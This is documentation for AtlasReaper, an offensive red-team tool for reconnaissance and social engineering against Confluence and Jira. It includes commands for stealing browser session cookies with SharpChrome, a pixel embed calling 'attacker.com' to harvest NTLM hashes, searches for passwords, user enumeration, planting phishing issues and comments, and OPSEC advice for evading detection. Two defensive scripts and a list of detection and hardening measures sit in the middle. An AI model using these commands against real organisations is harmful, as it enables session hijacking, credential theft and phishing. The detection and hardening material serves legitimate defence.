What is AtlasReaper?

AtlasReaper is a command-line tool developed for offensive security purposes, primarily focused on reconnaissance of Confluence and Jira platforms. It provides various features helpful for credential farming, social engineering, and information gathering in Atlassian environments.
Written in C# by @werdhaihai

Key Features

Confluence Reconnaissance

Search, enumerate, and interact with Confluence spaces, pages, and attachments

Jira Operations

Create issues, add comments, manage attachments, and enumerate projects

Credential Farming

Embed 1x1 pixel images to perform credential harvesting attacks

Cookie-Based Auth

Uses browser session tokens for authentication

Anonymous Access

Supports anonymous access when configured

Social Engineering

Create issues, add comments, and embed content for social engineering

Command Structure

AtlasReaper uses a hierarchical command structure:
AtlasReaper.exe [command] [subcommand] [options]

Available Commands

  • Confluence
  • Jira
  • Common
Confluence operations:
  • attach - Attach files to pages
  • download - Download attachments
  • embed - Embed 1x1 pixel images (credential farming)
  • link - Add links to pages
  • listattachments - Enumerate attachments
  • listpages - Enumerate pages
  • listspaces - Enumerate spaces
  • search - Search content with wildcard support

Authentication

Session Token Authentication

AtlasReaper supports cookie-based authentication using session tokens from user browsers:
1. Extract Session Tokens

Use SharpChrome or similar tools to dump cookies:
SharpChrome.exe cookies /showall

2. Locate Atlassian Cookies

Look for cookies scoped to *.atlassian.net:
  • cloud.session.token
  • tenant.session.token

3. Use in Commands

Provide the cookie value via the --cookie option:
AtlasReaper.exe [command] [subcommand] --cookie $cookie --url $url

Anonymous Access

If Confluence or Jira allows anonymous access, you can omit the cookie parameter:
AtlasReaper.exe confluence listspaces --url https://example.atlassian.net
Test for anonymous access by running commands without the --cookie parameter.

Use Cases

Reconnaissance Scenarios

Objective: Enumerate available resources and gather intelligence
  • List all Confluence spaces and pages
  • Enumerate Jira projects and issues
  • Search for sensitive information (credentials, keys, internal URLs)
  • Download attachments containing valuable data
  • Enumerate user lists for social engineering
Objective: Harvest credentials via embedded content
  • Embed 1x1 pixel images pointing to attacker-controlled servers
  • Monitor for authentication attempts (NTLM hashes)
  • Leverage Responder or similar tools to capture credentials
  • Target high-traffic pages for maximum exposure
Objective: Manipulate users for further access
  • Create legitimate-looking Jira issues
  • Add comments with malicious links
  • Attach seemingly benign files with payloads
  • Link to external resources for phishing
  • Impersonate legitimate workflows
Objective: Expand access within the organization
  • Search for internal URLs and endpoints
  • Enumerate API keys and tokens in documentation
  • Identify VPN configurations and access methods
  • Discover internal tools and services
  • Map organizational structure via user enumeration

Quick Start Examples

Confluence Operations

# List all spaces
AtlasReaper.exe confluence listspaces --url https://company.atlassian.net --cookie $cookie

# Search for sensitive information
AtlasReaper.exe confluence search --query "password*" --url $url --cookie $cookie

# Search for URLs with wildcard
AtlasReaper.exe confluence search --query "http*example.com*" --url $url --cookie $cookie

# List pages in a space
AtlasReaper.exe confluence listpages --space-key "DOCS" --url $url --cookie $cookie

# Download an attachment
AtlasReaper.exe confluence download --attachment-id "12345" --output "file.pdf" --url $url --cookie $cookie

# Attach a file to a page
AtlasReaper.exe confluence attach --page-id "12345" --file "document.pdf" --url $url --cookie $cookie

# Embed 1x1 pixel for credential farming
AtlasReaper.exe confluence embed --page-id "12345" --image-url "http://attacker.com/harvest.png" --url $url --cookie $cookie

Jira Operations

# List all projects
AtlasReaper.exe jira listprojects --url https://company.atlassian.net --cookie $cookie

# List issues in a project
AtlasReaper.exe jira listissues --project "PROJ" --url $url --cookie $cookie

# Search for issues
AtlasReaper.exe jira searchissues --query "security" --url $url --cookie $cookie

# Create a new issue
AtlasReaper.exe jira createissue --project "SUPPORT" --issue-type "Task" --message "Need access to VPN" --url $url --cookie $cookie

# Add a comment to an issue
AtlasReaper.exe jira addcomment --issue-key "PROJ-123" --comment "Please see attached" --url $url --cookie $cookie

# Attach a file to an issue
AtlasReaper.exe jira attach --issue-key "PROJ-123" --file "report.pdf" --url $url --cookie $cookie

# List users (for enumeration)
AtlasReaper.exe jira listusers --url $url --cookie $cookie

Detection Considerations

AtlasReaper activities can be detected by security monitoring tools and logging systems.

Detection Indicators

API Activity:
  • Unusual API request patterns
  • Rapid enumeration of resources
  • Anonymous access attempts (if disabled)
  • Session token usage from unexpected locations
  • File upload/download patterns
User Behavior:
  • Multiple page/issue creations from single account
  • Embedding of external images
  • Mass attachment downloads
  • Unusual search queries (wildcards, sensitive terms)
  • Comment spam or phishing attempts
Network Indicators:
  • Connections to unknown external image hosts
  • Outbound authentication attempts
  • UNC path connections (for credential harvesting)
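
The API-activity indicators above (rapid enumeration, session token usage from unexpected locations) written as detection logic. This is an added example, not part of AtlasReaper or its documentation. The log layout, session labels, thresholds and request paths are constructed assumptions; map them to the fields your proxy or audit log records.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records, not real logs.
# Assumed fields: timestamp, source IP, hashed session id, request path.
SAMPLE_LOG = """\
2024-05-01T09:00:00 10.1.4.20 sess-a1 /wiki/rest/api/content/1001
2024-05-01T09:03:10 10.1.4.20 sess-a1 /wiki/rest/api/content/1002
2024-05-01T09:05:00 10.1.7.33 sess-b2 /wiki/rest/api/content/2001
2024-05-01T09:20:00 203.0.113.50 sess-b2 /wiki/rest/api/space
2024-05-01T09:20:01 203.0.113.50 sess-b2 /wiki/rest/api/content?spaceKey=DOCS
2024-05-01T09:20:02 203.0.113.50 sess-b2 /wiki/rest/api/content/3001/child/attachment
2024-05-01T09:20:03 203.0.113.50 sess-b2 /wiki/rest/api/content/3002/child/attachment
2024-05-01T09:20:04 203.0.113.50 sess-b2 /wiki/rest/api/content/3003/child/attachment
2024-05-01T09:20:05 203.0.113.50 sess-b2 /wiki/rest/api/content/search?cql=text~secret
"""

def parse(log):
    """Turn log text into (time, ip, session, path) tuples."""
    events = []
    for line in log.strip().splitlines():
        ts, ip, session, path = line.split(maxsplit=3)
        events.append((datetime.fromisoformat(ts), ip, session, path))
    return events

def sessions_from_multiple_ips(events):
    """Session ids seen from more than one source IP."""
    ips = defaultdict(set)
    for _, ip, session, _ in events:
        ips[session].add(ip)
    return {s: sorted(v) for s, v in ips.items() if len(v) > 1}

def rapid_enumeration(events, max_paths=5, window=timedelta(seconds=10)):
    """Sessions requesting more than max_paths distinct paths inside one window."""
    by_session = defaultdict(list)
    for ts, _, session, path in events:
        by_session[session].append((ts, path))
    flagged = {}
    for session, hits in by_session.items():
        hits.sort()
        start = 0
        for end, (ts, _) in enumerate(hits):
            while ts - hits[start][0] > window:
                start += 1  # slide the window start forward
            distinct = len({p for _, p in hits[start:end + 1]})
            if distinct > max_paths:
                flagged[session] = max(flagged.get(session, 0), distinct)
    return flagged

if __name__ == "__main__":
    events = parse(SAMPLE_LOG)
    print(sessions_from_multiple_ips(events), rapid_enumeration(events))
```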

Defensive Recommendations

  • Monitor Confluence/Jira audit logs for suspicious activity
  • Alert on anonymous access attempts (if disabled)
  • Track API usage patterns for anomalies
  • Monitor for external image embedding
  • Detect mass enumeration attempts
  • Watch for unusual session token usage patterns
  • Alert on file downloads from sensitive spaces
  • Disable anonymous access if not required
  • Implement strict session token policies
  • Use IP allowlisting for Atlassian access
  • Enforce MFA for all users
  • Restrict permissions for space/project creation
  • Block external image embedding
  • Implement DLP for sensitive content
  • Regularly audit user permissions
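
One way to act on "Monitor for external image embedding": an added example (not from the AtlasReaper project) that audits page bodies in Confluence storage format for image references outside an allowlist and marks 1x1 sizes and UNC or file paths. ALLOWED_HOSTS, the page ids and the sample bodies are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_HOSTS = {"example.atlassian.net"}  # assumption: hosts allowed to serve images

class ImageRefAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._size = None  # (width, height) of the <ac:image> being parsed

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "ac:image":
            self._size = (a.get("ac:width"), a.get("ac:height"))
        elif tag == "ri:url" and self._size is not None:
            self._check(a.get("ri:value") or "", self._size)
        elif tag == "img":  # plain HTML images, e.g. in rendered or macro content
            self._check(a.get("src") or "", (a.get("width"), a.get("height")))

    def handle_endtag(self, tag):
        if tag == "ac:image":
            self._size = None

    def _check(self, url, size):
        reasons = []
        if url.startswith("\\\\") or url.lower().startswith("file:"):
            reasons.append("unc-or-file-path")
        else:
            host = urlparse(url).hostname  # None for relative and attachment paths
            if host and host not in ALLOWED_HOSTS:
                reasons.append("external-host")
        if reasons and size == ("1", "1"):
            reasons.append("1x1-pixel")
        if reasons:
            self.findings.append((url, reasons))

def audit_page(body):
    """Return [(url, reasons)] for one page body in storage format."""
    parser = ImageRefAudit()
    parser.feed(body)
    parser.close()
    return parser.findings

# Constructed page bodies keyed by page id (not taken from a real site).
PAGES = {
    "1001": '<ac:image><ri:attachment ri:filename="roadmap.png"/></ac:image>',
    "1002": '<ac:image ac:width="1" ac:height="1"><ri:url ri:value="http://images.example.net/p.png"/></ac:image>',
}
```

Feed it the storage-format body of each page returned by your export or API client and review any page with a non-empty result.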

Architecture

Target Platforms

Confluence

  • Confluence Cloud (*.atlassian.net)
  • Self-hosted Confluence (server/data center)
  • Anonymous and authenticated access
  • REST API interactions

Jira

  • Jira Cloud (*.atlassian.net)
  • Self-hosted Jira (server/data center)
  • Issue tracking and project management
  • User enumeration capabilities

Limitations

Be aware of the following limitations when using AtlasReaper:
  • Testing Coverage: Not thoroughly tested in all environments - unexpected behavior may occur
  • Authentication Methods: Only supports cloud.session.token or tenant.session.token from browsers
    • API tokens not currently supported
    • Personal access tokens not supported
    • OAuth not supported
  • Attribution: Write operations (create/comment/attach) will be attributed to the session token’s user or “anonymous”
  • Rate Limiting: May encounter API rate limits during aggressive enumeration
  • Error Handling: Some edge cases may cause crashes or unexpected behavior

OPSEC Considerations

  • Attribution: All actions are logged under the session token’s username
  • Timing: Space out requests to avoid detection
  • Volume: Limit enumeration to avoid triggering alerts
  • Content: Craft believable issues/comments for social engineering
  • Cleanup: Consider removing embedded content after farming
  • Use HTTPS for harvesting server (avoid cleartext)
  • Host harvesting infrastructure on legitimate-looking domains
  • Employ logging and monitoring of incoming connections
  • Use short-lived campaigns to minimize detection window
  • Clean up embedded images after successful harvest
  • Session tokens may expire or be revoked
  • Multiple concurrent uses may trigger anomaly detection
  • Original user may notice unusual activity
  • Session tokens typically tied to IP address
  • Consider token rotation if available

Command Reference

Confluence Commands

| Command | Description |
|---|---|
| attach | Attach a file to a Confluence page |
| download | Download attachments from Confluence |
| embed | Embed 1x1 pixel image for credential farming |
| link | Add a link to a Confluence page |
| listattachments | List attachments on a page |
| listpages | List pages in Confluence spaces |
| listspaces | List all Confluence spaces |
| search | Search Confluence content with wildcards |

Jira Commands

| Command | Description |
|---|---|
| addcomment | Add a comment to a Jira issue |
| attach | Attach a file to a Jira issue |
| createissue | Create a new Jira issue |
| download | Download attachments from an issue |
| listattachments | List attachments on an issue |
| listissues | List issues in Jira projects |
| listprojects | List all Jira projects |
| listusers | List Atlassian users |
| searchissues | Search Jira issues |

Contributing

If you encounter issues or have suggestions:
  • Submit a pull request
  • Open an issue on GitHub

Author

AtlasReaper is developed by @werdhaihai at SpecterOps.